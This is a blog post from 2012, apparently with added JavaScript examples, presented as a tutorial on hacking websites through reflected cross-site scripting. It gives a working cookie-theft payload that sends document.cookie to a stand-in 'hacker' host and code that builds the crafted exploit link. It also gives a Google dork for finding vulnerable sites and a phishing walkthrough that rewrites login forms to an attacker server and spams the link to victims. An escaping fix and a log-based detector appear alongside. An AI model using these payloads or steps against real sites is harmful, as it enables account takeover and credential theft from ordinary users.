Monday, September 24, 2012

How to hack a website using Cross site scripting (XSS)



What is Cross-site scripting :-

As quoted in Wikipedia
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."


There is no single, standardized classification of cross-site scripting flaws, but most
experts distinguish between at least two primary flavors of XSS: non-persistent (reflected, where the
payload is carried in the request and echoed straight back) and persistent (stored, where the payload is
saved by the site and served to later visitors). For more on persistent and non-persistent XSS, see my separate post on the topic.


In this tutorial I will explain the non-persistent (reflected) attack.

First of all you must find a vulnerable site (for this you can refer to
my post on how to find a vulnerable site).

After finding a site, enter the simple JavaScript given below in the search box or URL bar:
<SCRIPT>alert("XSS testing by hackhaholic.blogspot.com");</SCRIPT>

If a dialog box pops up as shown, the site is vulnerable to XSS: the server copied your input into the page without escaping it, and that is the bug the rest of this tutorial builds on.

In the above example we added a harmless alert dialog box.
In the next example I will show how a more sophisticated and
dangerous XSS payload can be used to exploit users.
One typical example is a simple cookie-theft exploit:

var img=new Image();img.src="http://hacker/"+document.cookie;

(In the crafted link this code is URL-encoded, which is why spaces appear as + or %20 when you see it in a URL.)

The previous JavaScript creates an image DOM object.



var img=new Image();



Since the JavaScript code executes within the http://victim/ origin, it has access to that site's cookies (those not marked HttpOnly; a cookie with the HttpOnly flag cannot be read from document.cookie, which is why that flag matters against this exact attack).

The image's src is then pointed at the hacker's website, so the browser silently requests that URL with the victim's cookies appended to it, and the hacker's server logs the request.


img.src="http://hacker/"+document.cookie;


Once the hacker has completed his exploit code, the crafted link looks like the following (shown unencoded for readability; "context" stands for whatever parameter the site reflects into its page, and the browser URL-encodes the whole thing when it is sent):

http://victim/?context="><script>var img=new Image();img.src="http://hacker/"+document.cookie;</script>

The leading "> closes the attribute and tag into which the site reflects the parameter, so the <script> element that follows is parsed as its own element and runs.
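The following is an added example, not code from the original post: a reflected-XSS sink written in the style of the http://victim/ search page described above, the same page with output escaping applied, and the crafted link that carries the cookie-theft payload. http://victim/ and http://hacker/ are the placeholder hosts from the text; the "q" parameter name, the page markup and the "?c=" collector parameter are assumptions made for this example. Run it with Node.js.

```javascript
// Added example, not code from the original post: a reflected-XSS sink in the
// style of the http://victim/ search page described above, the same page with
// output escaping, and the crafted link carrying the cookie-theft payload.
// http://victim/ and http://hacker/ are the placeholder hosts from the text;
// the "q" parameter name, the markup and the "?c=" parameter are assumptions.

// Output escaping: the fix for the vulnerable sink below.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the search term is copied verbatim into an attribute and into
// the page text, so any HTML in it becomes part of the document.
function renderSearchVulnerable(q) {
  return '<input name="q" value="' + q + '"><p>Results for ' + q + "</p>";
}

// Hardened: identical page, term escaped at the point of output.
function renderSearchSafe(q) {
  const e = escapeHtml(q);
  return '<input name="q" value="' + e + '"><p>Results for ' + e + "</p>";
}

// The cookie-theft payload from the text, with two details a working exploit
// needs: the cookie travels in a query string rather than being glued onto
// the path, and it is URL-encoded so the ';' and '=' inside it survive.
function cookieTheftPayload(collector) {
  return 'var img=new Image();img.src="' + collector +
         '?c="+encodeURIComponent(document.cookie);';
}

// Prefix "> to close the value="..." attribute and the <input> tag, then open
// a <script> element; this is the role of the "> at the start of the link.
function attributeBreakout(js) {
  return '"><script>' + js + "</script>";
}

// The link the attacker sends. encodeURIComponent is why spaces appear as
// %20 (or +, with form encoding) in such links.
function craftLink(base, param, payload) {
  return base + "?" + param + "=" + encodeURIComponent(payload);
}

// What the victim's browser receives when it follows the link: the server
// decodes the parameter and the vulnerable page reflects it.
function reflectedResponse(link) {
  const q = new URL(link).searchParams.get("q");
  return renderSearchVulnerable(q);
}

// Stand-alone run: print the crafted link and both renderings.
const demoLink = craftLink("http://victim/search", "q",
  attributeBreakout(cookieTheftPayload("http://hacker/")));
console.log(demoLink);
console.log(reflectedResponse(demoLink));
console.log(renderSearchSafe(new URL(demoLink).searchParams.get("q")));
```

The vulnerable rendering contains a live <script> element; the hardened one contains only &lt;script&gt; text, which the browser displays and never executes. Note that the payload itself is unchanged between the two: the difference is entirely in how the site handles its output.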



Now the hacker will advertise this specially crafted link through spam e-mail, message board posts, Instant Message (IM) messages and other channels, trying to attract user clicks. What makes this attack so effective is that
users are more likely to click on the link because the URL contains the real website's domain name, rather than a look-alike domain name as in normal phishing.

Phishing The Smart Way Using XSS Vulnerabilities

What is Cross Site Scripting?
It is a vulnerability typically found in web applications. An attacker can use this vulnerability to inject client-side script into web pages viewed by other users.


What can an attacker do with this?
Attackers can do the following things:

  •  Steal user session cookies, which can lead to complete account takeover
  •  Steal data on web pages viewed by the victim
  •  Deface pages viewed by the victim
  •  Use the site's own pages for phishing
In this article I am going to explain how phishing can be done using an XSS vulnerability in a web application. To understand this, you need to have knowledge of normal phishing.


Advantages over normal phishing:
In normal phishing the victim is given a link to a site made by the hacker. A person with basic knowledge can recognize that it is a fake link. With XSS the victim has little reason to suspect the link, because it points at the trusted site's real URL and the injected script runs inside that site's own page.


Demonstration Of XSS -Phishing 
Steps involved in the attack
  • Finding a XSS vulnerability
  • Craft your link.
  • Send the link to your victim

Step 1: Finding an XSS vulnerability
First we need to find a vulnerable website. This can be done using Google. Go to Google and search using the following dork:
inurl: "search.php?q="
To test for the vulnerability, inject the following code into the search fields or comment fields of the website:
<script>alert("you are hacked")</script>
If the page returns an alert box showing "you are hacked", that site is vulnerable to XSS.


Step 2: Craft your link.
In this step we craft a link that carries the payload through the vulnerable parameter of the website.
Your link will look like
http://site.com/search.php?q=<script>alert("you are hacked")</script>
Because the script executes in site.com's own page, you can use your specially crafted link to steal your victim's information just as in phishing, for example by rewriting the page's login form so that it submits to your own server, or by replacing the page content with a fake login page.


EXAMPLE:
I am showing you an example with a link found on Google.
Note:
This link is kept here for demonstration purposes only. I will not be held responsible if you do anything illegal with this, and this bug is not fixed yet. If Google fixes it, it may not work.


http://www.google.com/search?btnI&q=allinurl:http://www.101hacker.com/
(credits- wolfmankurd)
When the victim clicks this link, he will be redirected to http://www.101hacker.com/
Strictly speaking this is not script injection but an open redirect: the btnI parameter is Google's "I'm Feeling Lucky" button, which sends the browser straight to the first result for the query. It serves the same purpose as an XSS link for phishing, since the URL the victim sees carries Google's domain.
You can replace http://www.101hacker.com/ with your fake login page's link. Then it takes the victim to your fake login page.


Step 3: Send the link to your victim
Now you can send your specially crafted link to the victim by any means, as you do in normal phishing.
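The following is an added example, not code from either post above, written from the defender's side of steps 1 and 2: a small detector that scans web-server access-log lines for the kind of crafted links those steps produce (the cookie-theft link from the first tutorial, a form-rewrite phishing payload, and a double-encoded variant). The log lines, client addresses and hostnames are constructed for this example, and the indicator list is a starting point rather than a complete one. Run it with Node.js.

```javascript
// Added example, not code from either post above: a detector that scans
// web-server access-log lines for the crafted links produced in steps 1-2.
// The log lines, client addresses and hostnames below are constructed for
// this example; the indicator list is a starting point, not a complete one.

const INDICATORS = [
  [/<\s*script/i, "script-tag"],
  [/javascript\s*:/i, "javascript-uri"],
  [/\bon[a-z]+\s*=/i, "event-handler"],
  [/document\.cookie/i, "cookie-access"],
  [/\bnew\s+Image\s*\(/i, "image-beacon"],
  [/\.action\s*=/i, "form-action-rewrite"],
];

// Decode a query string the way the application would (+ means space, then
// %xx), and keep decoding so double-encoded payloads (%253C -> %3C -> <) are
// also caught. Malformed %-sequences stop decoding rather than throwing.
function decodeQuery(qs, rounds = 2) {
  let out = qs.replace(/\+/g, " ");
  for (let i = 0; i < rounds; i++) {
    let next;
    try {
      next = decodeURIComponent(out);
    } catch (e) {
      break;
    }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Common Log Format: client ident user [time] "METHOD path HTTP/x" status bytes
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" (\d{3}) \d+/;

// Returns null for lines that do not parse or carry no indicator.
function scanLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, client, path, status] = m;
  const i = path.indexOf("?");
  const decoded = i < 0 ? "" : decodeQuery(path.slice(i + 1));
  const hits = INDICATORS.filter(([re]) => re.test(decoded)).map(([, name]) => name);
  return hits.length ? { client, path, status: Number(status), hits } : null;
}

function scanLog(text) {
  return text.split("\n").map(scanLine).filter(Boolean);
}

// Constructed sample: a benign search, the cookie-theft link from the first
// tutorial, a phishing payload that points the page's login form at an
// attacker host, a double-encoded event-handler injection, and a junk line.
const SAMPLE_LOG = [
  '203.0.113.5 - - [24/Sep/2012:10:01:02 +0000] "GET /search.php?q=onion+soup HTTP/1.1" 200 5120',
  '198.51.100.7 - - [24/Sep/2012:10:02:13 +0000] "GET /search.php?q=%22%3E%3Cscript%3Evar+img%3Dnew+Image()%3Bimg.src%3D%22http%3A%2F%2Fhacker%2F%3Fc%3D%22%2BencodeURIComponent(document.cookie)%3B%3C%2Fscript%3E HTTP/1.1" 200 5304',
  '198.51.100.7 - - [24/Sep/2012:10:02:41 +0000] "GET /search.php?q=%3Cscript%3Edocument.forms%5B0%5D.action%3D%22http%3A%2F%2Fphish.example%2Flogin%22%3C%2Fscript%3E HTTP/1.1" 200 5240',
  '198.51.100.9 - - [24/Sep/2012:10:03:05 +0000] "GET /search.php?q=%2522%2520onmouseover%253Dalert(1)%2520x%253D%2522 HTTP/1.1" 200 5111',
  'garbage line that is not in common log format',
].join("\n");

// Stand-alone run: print each flagged request and its indicators.
for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.client, hit.hits.join(","), hit.path);
}
```

The decode step is the part that matters: matching raw URLs would miss the double-encoded line, and a single decode pass would too. The benign "onion soup" query shows why the event-handler pattern requires an "=" after the handler name; without it, ordinary words starting with "on" would be flagged.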


Conclusion:
This is a dangerous vulnerability in web applications; it was ranked 2nd (A2) in the OWASP Top 10 of 2010. If a hacker finds this vulnerability on a bank's website, he can mount an attack against the customers of the bank and steal information such as credit card numbers, account numbers and passwords simply by sending a mass mail with the crafted link to the bank's customers.